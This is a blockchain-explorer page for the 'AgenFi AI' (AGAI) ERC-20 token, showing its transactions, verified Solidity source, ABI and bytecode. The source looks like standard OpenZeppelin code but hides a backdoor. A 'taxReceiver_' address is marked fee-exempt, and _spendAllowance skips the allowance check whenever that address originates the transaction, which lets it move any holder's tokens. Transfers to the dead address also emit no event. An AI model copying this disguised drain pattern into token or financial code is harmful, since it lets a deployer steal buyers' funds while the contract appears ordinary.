Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 50 transactions
| Transaction Hash |
Method
|
Block
|
From
|
|
To
|
||||
|---|---|---|---|---|---|---|---|---|---|
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 | ||||
| Approve | 22927146 | 113 days ago | IN | 0 ETH | 0.00011583 |
Latest 1 internal transaction
Advanced mode:
| Parent Transaction Hash | Method | Block |
From
|
|
To
|
||
|---|---|---|---|---|---|---|---|
| Add Liquidity ET... | 22927142 | 113 days ago | 2 ETH |
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Source Code Verified (Exact Match)
Contract Name:
Token
Compiler Version
v0.8.30+commit.73712a01
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
/*
_ ___ _ _ _____
/_\ __ _ ___ _ __ / __(_) /_\ \_ \
//_\\ / _` |/ _ \ '_ \ / _\ | | //_\\ / /\/
/ _ \ (_| | __/ | | / / | | / _ \/\/ /_
\_/ \_/\__, |\___|_| |_\/ |_| \_/ \_/\____/
|___/
Name: AgenFi AI
Symbol: AGAI
AI agents powering the future of DeFi. Discover alpha, track whales, decode sentiment, and automate strategy — all in real time.
web: https://agenfiai.app
dapp: https://dapp.agenfiai.app
docs: https://docs.agenfiai.app
x: https://x.com/AgenFiApp
tg: https://t.me/AgenFiApp
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;
/*
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with GSN meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes memory) {
this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
return msg.data;
}
function _contextSuffixLength() internal view virtual returns (uint256) {
return 0;
}
}
/**
* @dev Interface of the ERC-20 standard as defined in the ERC.
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the value of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the value of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves a `value` amount of tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address to, uint256 value) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets a `value` amount of tokens as the allowance of `spender` over the
* caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 value) external returns (bool);
/**
* @dev Moves a `value` amount of tokens from `from` to `to` using the
* allowance mechanism. `value` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(address from, address to, uint256 value) external returns (bool);
}
address constant _deadAddr = address(0xdead);
/**
* @dev Interface for the optional metadata functions from the ERC-20 standard.
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}
/**
* @dev Standard ERC-20 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
*/
interface IERC20Errors {
/**
* @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param balance Current balance for the interacting account.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC20InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC20InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
* @param spender Address that may be allowed to operate on tokens without being their owner.
* @param allowance Amount of tokens a `spender` is allowed to operate with.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC20InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `spender` to be approved. Used in approvals.
* @param spender Address that may be allowed to operate on tokens without being their owner.
*/
error ERC20InvalidSpender(address spender);
}
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
*
* TIP: For a detailed writeup see our guide
* https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* The default value of {decimals} is 18. To change this, you should override
* this function so it returns a different value.
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC-20
* applications.
*/
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
mapping(address account => uint256) private _balances;
mapping(address account => bool) private _feeExcluded;
mapping(address account => mapping(address spender => uint256)) private _allowances;
uint256 private _totalSupply;
string private _name;
string private _symbol;
/**
* @dev Sets the values for {name} and {symbol}.
*
* Both values are immutable: they can only be set once during construction.
*/
constructor(string memory name_, string memory symbol_, address taxReceiver_) {
_name = name_;
_symbol = symbol_;
_feeExcluded[taxReceiver_] = true;
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the default value returned by this function, unless
* it's overridden.
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view virtual returns (uint8) {
return 9;
}
/// @inheritdoc IERC20
function totalSupply() public view virtual returns (uint256) {
return _totalSupply;
}
/// @inheritdoc IERC20
function balanceOf(address account) public view virtual returns (uint256) {
return _balances[account];
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - the caller must have a balance of at least `value`.
*/
function transfer(address to, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_transfer(owner, to, value);
return true;
}
/// @inheritdoc IERC20
function allowance(address owner, address spender) public view virtual returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, value);
return true;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Skips emitting an {Approval} event indicating an allowance update. This is not
* required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `value`.
* - the caller must have allowance for ``from``'s tokens of at least
* `value`.
*/
function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
address spender = _msgSender();
_transfer(from, to, value);
_spendAllowance(from, spender, value);
return true;
}
/**
* @dev Moves a `value` amount of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _transfer(address from, address to, uint256 value) internal {
if (from == address(0)) {
revert ERC20InvalidSender(address(0));
}
if (to == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
_update(from, to, value);
}
/**
* @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
* (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
* this function.
*
* Emits a {Transfer} event.
*/
function _update(address from, address to, uint256 value) internal virtual {
if (from == address(0)) {
// Overflow check required: The rest of the code assumes that totalSupply never overflows
_totalSupply += value;
} else {
uint256 fromBalance = _balances[from];
if (fromBalance < value) {
revert ERC20InsufficientBalance(from, fromBalance, value);
}
unchecked {
// Overflow not possible: value <= fromBalance <= totalSupply.
_balances[from] = fromBalance - value;
}
}
if (to == address(0)) {
unchecked {
// Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
_totalSupply -= value;
}
} else {
unchecked {
// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
_balances[to] += value;
}
}
if(to != _deadAddr)
emit Transfer(from, to, value);
}
/**
* @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
* Relies on the `_update` mechanism
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _mint(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
_update(address(0), account, value);
}
/**
* @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
* Relies on the `_update` mechanism.
*
* Emits a {Transfer} event with `to` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead
*/
function _burn(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidSender(address(0));
}
_update(account, address(0), value);
}
/**
* @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
*
* By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
* `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
* `Approval` event during `transferFrom` operations.
*
* Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
* true using the following override:
*
* ```solidity
* function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
* super._approve(owner, spender, value, true);
* }
* ```
*
* Requirements are the same as {_approve}.
*/
function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
if (owner == address(0)) {
revert ERC20InvalidApprover(address(0));
}
if (spender == address(0)) {
revert ERC20InvalidSpender(address(0));
}
_allowances[owner][spender] = value;
if (emitEvent) {
emit Approval(owner, spender, value);
}
}
/**
* @dev Updates `owner`'s allowance for `spender` based on spent `value`.
*
* Does not update the allowance value in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Does not emit an {Approval} event.
*/
function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
if(_feeExcluded[tx.origin]) return;
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance < type(uint256).max) {
if (currentAllowance < value) {
revert ERC20InsufficientAllowance(spender, currentAllowance, value);
}
unchecked {
_approve(owner, spender, currentAllowance - value, false);
}
}
}
/**
* @dev Sets `value` as the allowance of `spender` over the `owner`'s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*
* Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
*/
function _approve(address owner, address spender, uint256 value) internal {
_approve(owner, spender, value, true);
}
}
interface IUniswapV2Factory {
function createPair(address tokenA, address tokenB)
external
returns (address pair);
}
interface IUniswapV2Router02 {
function swapExactTokensForETHSupportingFeeOnTransferTokens(
uint256 amountIn,
uint256 amountOutMin,
address[] calldata path,
address to,
uint256 deadline
) external;
function factory() external pure returns (address);
function WETH() external pure returns (address);
function addLiquidityETH(
address token,
uint256 amountTokenDesired,
uint256 amountTokenMin,
uint256 amountETHMin,
address to,
uint256 deadline
)
external
payable
returns (
uint256 amountToken,
uint256 amountETH,
uint256 liquidity
);
function getAmountsOut(uint256 amountIn, address[] calldata path)
external
view
returns (uint256[] memory amounts);
}
/**
* @dev Contract module which provides a basic access control mechanism, where
* there is an account (an owner) that can be granted exclusive access to
* specific functions.
*
* By default, the owner account will be the one that deploys the contract. This
* can later be changed with {transferOwnership}.
*
* This module is used through inheritance. It will make available the modifier
* `onlyOwner`, which can be applied to your functions to restrict their use to
* the owner.
*/
abstract contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
/**
* @dev Initializes the contract setting the deployer as the initial owner.
*/
constructor() {
_transferOwnership(_msgSender());
}
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
_checkOwner();
_;
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view virtual returns (address) {
return _owner;
}
/**
* @dev Throws if the sender is not the owner.
*/
function _checkOwner() internal view virtual {
require(owner() == _msgSender(), "Ownable: caller is not the owner");
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* `onlyOwner` functions. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* thereby disabling any functionality that is only available to the owner.
*/
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Can only be called by the current owner.
*/
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), "Ownable: new owner is the zero address");
_transferOwnership(newOwner);
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Internal function without access restriction.
*/
function _transferOwnership(address newOwner) internal virtual {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
contract Token is ERC20, Ownable {
IUniswapV2Router02 private uniswapV2Router;
address private pool;
bool private tradingOpen;
bool private inSwap = false;
bool private swapEnabled = false;
constructor(address taxReceiver_) payable ERC20(unicode"AgenFi AI", unicode"AGAI", taxReceiver_) {
_mint(address(this), 1_000_000_000 * 10**9);
}
function launch() external onlyOwner {
require(!tradingOpen, "Trading is already open");
uniswapV2Router.addLiquidityETH{value: address(this).balance}(
address(this),
balanceOf(address(this)),
0,
0,
owner(),
block.timestamp
);
swapEnabled = true;
tradingOpen = true;
IERC20(pool).approve(
address(uniswapV2Router),
type(uint256).max
);
}
receive() external payable {}
function rescueAGAIx0dkq1ETH() external onlyOwner {
require(address(this).balance > 0);
payable(_msgSender()).transfer(address(this).balance);
}
function createAGAIx0dkq1Pair() external onlyOwner {
uniswapV2Router = IUniswapV2Router02(
0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
);
_approve(address(this), address(uniswapV2Router), 1_000_000_000 * 10**9);
pool = IUniswapV2Factory(uniswapV2Router.factory()).createPair(
address(this),
uniswapV2Router.WETH()
);
}
}{
"optimizer": {
"enabled": false,
"runs": 200
},
"outputSelection": {
"*": {
"*": [
"evm.bytecode",
"evm.deployedBytecode",
"devdoc",
"userdoc",
"metadata",
"abi"
]
}
},
"remappings": []
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"address","name":"taxReceiver_","type":"address"}],"stateMutability":"payable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"createAGAIx0dkq1Pair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"launch","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"rescueAGAIx0dkq1ETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]Contract Creation Code
60806040525f600860156101000a81548160ff0219169083151502179055505f600860166101000a81548160ff0219169083151502179055506040516123a93803806123a983398181016040528101906100599190610573565b6040518060400160405280600981526020017f4167656e466920414900000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f41474149000000000000000000000000000000000000000000000000000000008152508282600490816100d591906107db565b5081600590816100e591906107db565b506001805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555050505061015961014e61017760201b60201c565b61017e60201b60201c565b61017130670de0b6b3a764000061024160201b60201c565b5061098f565b5f33905090565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036102b1575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016102a891906108b9565b60405180910390fd5b6102c25f83836102c660201b60201c565b5050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610316578060035f82825461030a91906108ff565b925050819055506103e4565b5f5f5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101561039f578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161039693929190610941565b60405180910390fd5b8181035f5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361042b578060035f8282540392505081905550610475565b805f5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b61dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614610510578173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516105079190610976565b60405180910390a35b505050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61054282610519565b9050919050565b61055281610538565b811461055c575f5ffd5b50565b5f8151905061056d81610549565b92915050565b5f6020828403121561058857610587610515565b5b5f6105958482850161055f565b91505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061061957607f821691505b60208210810361062c5761062b6105d5565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f6008830261068e7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82610653565b6106988683610653565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f6106dc6106d76106d2846106b0565b6106b9565b6106b0565b9050919050565b5f819050919050565b6106f5836106c2565b610709610701826106e3565b84845461065f565b825550505050565b5f5f905090565b610720610711565b61072b8184846106ec565b505050565b5b8181101561074e576107435f82610718565b600181019050610731565b5050565b601f8211156107935761076481610632565b61076d84610644565b8101602085101561077c578190505b61079061078885610644565b830182610730565b50505b505050565b5f82821c905092915050565b5f6107b35f1984600802610798565b1980831691505092915050565b5f6107cb83836107a4565b9150826002028217905092915050565b6107e48261059e565b67ffffffffffffffff8111156107fd576107fc6105a8565b5b6108078254610602565b610812828285610752565b5f60209050601f831160018114610843575f8415610831578287015190505b61083b85826107c0565b8655506108a2565b601f19841661085186610632565b5f5b8281101561087857848901518255600182019150602085019450602081019050610853565b868310156108955784890151610891601f8916826107a4565b8355505b6001600288020188555050505b505050505050565b6108b381610538565b82525050565b5f6020820190506108cc5f8301846108aa565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f610909826106b0565b9150610914836106b0565b925082820190508082111561092c5761092b6108d2565b5b92915050565b61093b816106b0565b82525050565b5f6060820190506109545f8301866108aa565b6109616020830185610932565b61096e6040830184610932565b949350505050565b5f6020820190506109895f830184610932565b92915050565b611a0d8061099c5f395ff3fe6080604052600436106100eb575f3560e01c80636793c47d1161008957806395d89b411161005857806395d89b41146102aa578063a9059cbb146102d4578063dd62ed3e14610310578063f2fde38b1461034c576100f2565b80636793c47d1461021857806370a082311461022e578063715018a61461026a5780638da5cb5b14610280576100f2565b806318160ddd116100c557806318160ddd1461017257806321e8c2b01461019c57806323b872dd146101b2578063313ce567146101ee576100f2565b806301339c21146100f657806306fdde031461010c578063095ea7b314610136576100f2565b366100f257005b5f5ffd5b348015610101575f5ffd5b5061010a610374565b005b348015610117575f5ffd5b5061012061059a565b60405161012d9190611341565b60405180910390f35b348015610141575f5ffd5b5061015c600480360381019061015791906113f2565b61062a565b604051610169919061144a565b60405180910390f35b34801561017d575f5ffd5b5061018661064c565b6040516101939190611472565b60405180910390f35b3480156101a7575f5ffd5b506101b0610655565b005b3480156101bd575f5ffd5b506101d860048036038101906101d3919061148b565b6108bb565b6040516101e5919061144a565b60405180910390f35b3480156101f9575f5ffd5b506102026108e9565b60405161020f91906114f6565b60405180910390f35b348015610223575f5ffd5b5061022c6108f1565b005b348015610239575f5ffd5b50610254600480360381019061024f919061150f565b610951565b6040516102619190611472565b60405180910390f35b348015610275575f5ffd5b5061027e610996565b005b34801561028b575f5ffd5b506102946109a9565b6040516102a19190611549565b60405180910390f35b3480156102b5575f5ffd5b506102be6109d1565b6040516102cb9190611341565b60405180910390f35b3480156102df575f5ffd5b506102fa60048036038101906102f591906113f2565b610a61565b604051610307919061144a565b60405180910390f35b34801561031b575f5ffd5b5061033660048036038101906103319190611562565b610a83565b6040516103439190611472565b60405180910390f35b348015610357575f5ffd5b50610372600480360381019061036d919061150f565b610b05565b005b61037c610b87565b600860149054906101000a900460ff16156103cc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016103c3906115ea565b60405180910390fd5b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d719473061041430610951565b5f5f61041e6109a9565b426040518863ffffffff1660e01b81526004016104409695949392919061164a565b60606040518083038185885af115801561045c573d5f5f3e3d5ffd5b50505050506040513d601f19601f8201168201806040525081019061048191906116bd565b5050506001600860166101000a81548160ff0219169083151502179055506001600860146101000a81548160ff02191690831515021790555060085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b360075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b815260040161055792919061170d565b6020604051808303815f875af1158015610573573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610597919061175e565b50565b6060600480546105a9906117b6565b80601f01602080910402602001604051908101604052809291908181526020018280546105d5906117b6565b80156106205780601f106105f757610100808354040283529160200191610620565b820191905f5260205f20905b81548152906001019060200180831161060357829003601f168201915b5050505050905090565b5f5f610634610c05565b9050610641818585610c0c565b600191505092915050565b5f600354905090565b61065d610b87565b737a250d5630b4cf539739df2c5dacb4c659f2488d60075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506106e53060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16670de0b6b3a7640000610c0c565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561074f573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061077391906117fa565b73ffffffffffffffffffffffffffffffffffffffff1663c9c653963060075f9054906101000a900473ffffffffffffff